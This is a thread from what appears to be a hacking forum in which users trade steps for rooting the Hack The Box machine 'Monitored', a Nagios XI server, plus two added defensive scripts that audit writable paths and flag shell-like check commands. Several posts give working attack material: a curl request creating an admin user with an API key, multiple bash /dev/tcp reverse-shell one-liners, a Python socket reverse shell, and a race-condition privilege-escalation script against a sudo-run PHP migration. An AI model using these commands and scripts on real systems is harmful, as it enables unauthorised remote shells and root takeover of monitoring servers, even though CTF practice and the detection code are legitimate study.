Monitored - HTB
by paven - Saturday January 13, 2024 at 12:13 PM
#91
(Jan 14, 2024, 01:07 AM)peRd1 Wrote:
(Jan 14, 2024, 12:59 AM)ByteBuster Wrote:
(Jan 14, 2024, 12:56 AM)peRd1 Wrote:
(Jan 14, 2024, 12:33 AM)zeroedbykrycek Wrote: Any hint on what to look into after getting the nagios panel using svc creds?
Try finding an sql injection vulnerability and dump those tables

Do we need the svc user's token to perform SQL injection? I'm having trouble getting SQL injection to work on the banner URL

That's what you need to work on, that damned banner ajax url... but but but, you need a proper cookie for it.

That auth token is not enough for injection. But it is enough to login to the endpoint. You need to login and grab the proper cookie, use that with sqlmap.

It should make sense.

How do you know that the banner ajax URL accepts the auth token from the API? Also, how did you find that API endpoint?

(Jan 14, 2024, 08:25 AM)ohmical Wrote:
(Jan 14, 2024, 08:14 AM)wardensec Wrote:
(Jan 14, 2024, 07:28 AM)yonigga Wrote: get the admin api_key which you have in xi_users in sqlmap to add new user with admin privilege --> login with the created user with admin privileges, add cmd --> rev shell, gg

I can add users, how do you add them as admins? I've tried a few parameter with no luck

add admin user like this

curl -X POST "http://{IP}/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=test&password=test&name=test&email=test@LocalHost&auth_level=admin"
How did you find out this `auth_level` parameter?
Reply
#92
(Jan 14, 2024, 04:15 PM)R4F4U Wrote: I still can't get the shell ....

I can't vi /usr/local/nagios/bin/npcd because I can't get a stable shell, so I uploaded my own npcd file:

#!/bin/bash

bash -i >& /dev/tcp/10.10.x.x/9002 0>&1


run sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd

and nothing

For a stable shell:
Ctrl-Z on your nc connection
stty raw -echo
fg
reset
export TERM=xterm
stty -a
stty rows <num> columns <cols>
Reply
#93
Hello,

Here is my privesc abusing a race condition

-1)
mv /usr/local/nagiosxi/tmp/migrate /usr/local/nagiosxi/tmp/migrate.bak
mkdir /usr/local/nagiosxi/tmp/migrate

0) cat sploit.py
#!/usr/bin/env python
# coding: utf-8

import asyncore
import pyinotify  ## Download https://raw.githubusercontent.com/seb-m/pyinotify/master/python3/pyinotify.py and copy in the same directory of sploit.py
import os

wm = pyinotify.WatchManager()  # Watch Manager
mask = pyinotify.IN_ACCESS | pyinotify.IN_CREATE | pyinotify.IN_OPEN  # watched events

class EventHandler(pyinotify.ProcessEvent):
    def process_IN_CREATE(self, event):
        print("ca passe")
        if "nagios_unbundler.py" in event.pathname:
            os.system("cp /tmp/json.py /usr/local/nagiosxi/tmp/migrate")
            print("ca passe")

notifier = pyinotify.AsyncNotifier(wm, EventHandler())
wdd = wm.add_watch('/usr/local/nagiosxi/tmp/', mask, rec=True)
asyncore.loop()

1) cat /tmp/json.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.115",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

2) launch a listener
nc -nlvp 2222

2.) launch the race condition script
python sploit.py

3) Exploit:
sudo  /usr/bin/php  /usr/local/nagiosxi/scripts/migrate/migrate.php  badaboom
Reply
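The race in post #93 depends on a sudo-run script working inside a directory that the unprivileged user can rename and repopulate. An added example (not from the thread or from Nagios), written from the defender's side: walk every ancestor of a path used by a root-run script and report components that an account outside a trusted set could modify. The function names, the directory modes and the temporary tree are constructed assumptions.

```python
import os
import stat
import tempfile

def writable_by_untrusted(path, trusted_uids=(0,), stop_at="/"):
    """Return [(directory, reason)] for every component from `path` up to
    `stop_at` that an account outside `trusted_uids` could modify."""
    findings = []
    current, stop_at = os.path.abspath(path), os.path.abspath(stop_at)
    while True:
        st = os.lstat(current)
        if stat.S_ISLNK(st.st_mode):
            findings.append((current, "symlink, audit its target separately"))
        elif st.st_uid not in trusted_uids:
            findings.append((current, f"owned by uid {st.st_uid}"))
        elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            # Conservative: any group/other write bit is reported. A sticky
            # bit limits renames of others' entries but not creating new ones.
            sticky = ", sticky" if st.st_mode & stat.S_ISVTX else ""
            findings.append((current, f"group/other writable{sticky}"))
        parent = os.path.dirname(current)
        if current == stop_at or parent == current:
            return findings
        current = parent

def demo():
    """Constructed tree with assumed modes; the current uid stands in for root."""
    base = tempfile.mkdtemp()
    layout = {"nagiosxi": 0o755, "nagiosxi/scripts": 0o755,
              "nagiosxi/tmp": 0o777, "nagiosxi/tmp/migrate": 0o755}
    for rel, mode in layout.items():
        os.mkdir(os.path.join(base, rel))
        os.chmod(os.path.join(base, rel), mode)
    trusted = (os.getuid(),)
    return {rel: writable_by_untrusted(os.path.join(base, rel), trusted, base)
            for rel in ("nagiosxi/scripts", "nagiosxi/tmp/migrate")}

if __name__ == "__main__":
    for rel, findings in demo().items():
        print(rel, "->", findings or "clean")
```

On a real host, call `writable_by_untrusted` with the default `trusted_uids=(0,)` on each path a sudoers-listed script reads from or writes to; any finding means that script's inputs are not under root's sole control.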
#94
I'm curious how you guys found the API documentation for the nagiosxi backend API, I didn't find any public API documentation for nagiosxi

(Jan 16, 2024, 03:03 AM)heisenberrg Wrote: I'm curious how you guys found the API documentation for the nagiosxi backend API, I didn't find any public API documentation for nagiosxi

nvm, I found the API doc on the nagiosxi online demo. https://nagiosxi.demos.nagios.com
Reply
#95
(Jan 14, 2024, 12:26 AM)ElBakhaw Wrote: I'll share full writeup 100% free tomorrow, I have rooted

Please do so, waiting on it eagerly!!
Reply
#96
(Jan 14, 2024, 09:43 AM)peRd1 Wrote:
(Jan 14, 2024, 09:29 AM)camiyi3472 Wrote: Can anyone help please?

I am having trouble getting a reverse shell from configure > core config manager 

Command Name:
shell

Command Line: bash -i >& /dev/tcp/10.10.XX.XX/8080 0>&1

kali@root: nc -lnvp 8080

i save it and apply changes yet no result,

few things: 
- remove your ip address from this post and the post earlier (for your own safety).
- add New Command, as you did, save it, by Apply configurations.
- however use something like bash -c 'bash -i >& /dev/tcp/10.10.x.x/8080 0>&1'
- then add the check since you want to get it executed: Configure > Core Config Manager > Monitoring (left pane) > Services > Add new > select your newly created check command...
> then you will have Run Check Command there.

Damn bois, you get access & privesc and everything then when you successfully get into a service you are getting lost with the options and buttons ....

Also try bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1'

Hey, my shell keeps disconnecting, how do I stabilize it?
Reply
#97
(Jan 14, 2024, 09:43 AM)peRd1 Wrote:
(Jan 14, 2024, 09:29 AM)camiyi3472 Wrote: Can anyone help please?

I am having trouble getting a reverse shell from configure > core config manager 

Command Name:
shell

Command Line: bash -i >& /dev/tcp/10.10.XX.XX/8080 0>&1

kali@root: nc -lnvp 8080

i save it and apply changes yet no result,

few things: 
- remove your ip address from this post and the post earlier (for your own safety).
- add New Command, as you did, save it, by Apply configurations.
- however use something like bash -c 'bash -i >& /dev/tcp/10.10.x.x/8080 0>&1'
- then add the check since you want to get it executed: Configure > Core Config Manager > Monitoring (left pane) > Services > Add new > select your newly created check command...
> then you will have Run Check Command there.

Damn bois, you get access & privesc and everything then when you successfully get into a service you are getting lost with the options and buttons ....

Also try bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1'

After using these steps, when I apply the configurations I am getting an error: "An error occurred while attempting to apply your configuration to Nagios Core. Monitoring engine configuration files have been rolled back to their last known good checkpoint.


<div>Error: Service has no hosts and/or service_description (config file '/usr/local/nagios/etc/services/Gandu.cfg', starting on line 16)</div>"

Nagios Core 4.4.13
Copyright © 2009-present Nagios Core Development Team and Community Contributors
Copyright © 1999-2009 Ethan Galstad
Last Modified: 2023-06-01
License: GPL

Website: https://www.nagios.org
Reading configuration data...
  Read main config file okay...
Error: Service has no hosts and/or service_description (config file '/usr/local/nagios/etc/services/Gandu.cfg', starting on line 16)
  Error processing object config files!


***> One or more problems was encountered while processing the config files...

    Check your configuration file(s) to ensure that they contain valid
    directives and data definitions.  If you are upgrading from a previous
    version of Nagios, you should be aware that some variables/definitions
    may have been removed or modified in this version.  Make sure to read
    the HTML documentation regarding the config files, as well as the
    'Whats New' section to find out what has changed.


How can it be rectified, the command i am running is : bash -c 'exec bash -i &>/dev/tcp/10.XX.XX.XX/5555 <&1'

I understand that I have to make changes in the config file adding the hosts and service name but since I have no terminal access to the server I'm unable to edit the config file and even on the nagios web-interface i cannot locate where to add these values.

Any help appreciated.
Reply
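Posts #96 and #97 show shell command lines being saved as Nagios check commands through Core Config Manager. An added example (not from the thread or from Nagios) of the matching defensive check: parse `define command` blocks from object-config text and flag command lines that contain the constructs quoted in those posts. The function names and the sample configuration are constructed for illustration.

```python
import re

# Patterns taken from the command lines quoted in this thread.
SUSPICIOUS = {
    "bash network redirection": re.compile(r"/dev/(?:tcp|udp)/"),
    "interactive shell": re.compile(r"\b(?:ba)?sh\s+-i\b"),
}

def parse_commands(text):
    """Yield (command_name, command_line) for each `define command` block."""
    block = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # blank line or comment
        if re.match(r"define\s+command\s*\{", line):
            block = {}
        elif line == "}":
            if block is not None:
                yield block.get("command_name", "?"), block.get("command_line", "")
            block = None
        elif block is not None:
            parts = line.split(None, 1)  # directive, then the rest of the line
            if len(parts) == 2:
                block[parts[0]] = parts[1].strip()

def audit(text):
    """Return [(command_name, [reasons])] for commands matching any pattern."""
    hits = []
    for name, cmd in parse_commands(text):
        reasons = [label for label, rx in SUSPICIOUS.items() if rx.search(cmd)]
        if reasons:
            hits.append((name, reasons))
    return hits

# Constructed sample config, not taken from the box.
SAMPLE = r"""
define command {
    command_name    check_ping
    command_line    $USER1$/check_ping -H $HOSTADDRESS$ -w 100.0,20% -c 500.0,60%
}
define service {
    service_description    PING
}
define command {
    command_name    shell
    command_line    bash -c 'bash -i >& /dev/tcp/10.10.x.x/8080 0>&1'
}
"""
```

Running `audit()` over the monitoring server's command definitions after each applied configuration gives a cheap alert on check commands that are really shells.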
#98
(Jan 13, 2024, 07:40 PM)Impulsive1393 Wrote: SNMPWALK shows info

Sorry to bother with what may be a dumb question... (a noob here)
how could you identify that the machine has snmp? No ports of that sort were open during the nmap scan for me.
Reply
#99
(Jan 17, 2024, 08:37 AM)r0001 Wrote:
(Jan 13, 2024, 07:40 PM)Impulsive1393 Wrote: SNMPWALK shows info

Sorry to bother with what may be a dumb question... (a noob here)
how could you identify that the machine has snmp? No ports of that sort were open during the nmap scan for me.

You aren't completely wrong there. Have you tried a UDP port scan via nmap as well??
Reply
Anyone else still getting the "Login error. Token expired"??? And how do I get rid of it?
Reply

